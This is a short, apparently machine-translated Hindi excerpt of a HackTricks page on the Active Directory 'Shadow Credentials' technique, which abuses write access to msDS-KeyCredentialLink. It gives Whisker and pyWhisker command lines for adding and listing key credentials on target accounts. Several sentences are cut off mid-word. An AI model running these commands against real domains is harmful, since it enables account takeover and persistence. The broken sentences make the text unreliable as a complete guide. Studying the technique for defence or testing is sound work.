hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md

3.5 KiB

छाया प्रमाणपत्र

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

परिचय

इस तकनीक के बारे में सभी जानकारी के लिए मूल पोस्ट की जांच करें

सारांश में: यदि आप किसी उपयोगकर्ता/कंप्यूटर के msDS-KeyCredentialLink गुण को लिख सकते हैं, तो आप उस ऑब्ज

Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1

pyWhisker

यह UNIX-आधारित सिस्टम पर Whisker क्षमताओं को बढ़ाता है, Impacket और PyDSInternals का उपयोग करके पूर्ण शोषण क्षमताओं के लिए, जैसे KeyCredentials की सूची, जोड़ना, और हटाना, साथ ही उन्हें JSON प्रारूप में आयात और निर्यात करना।

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"

शैडोस्प्रे

शैडोस्प्रे का उद्देश्य है **डोमेन ऑब्ज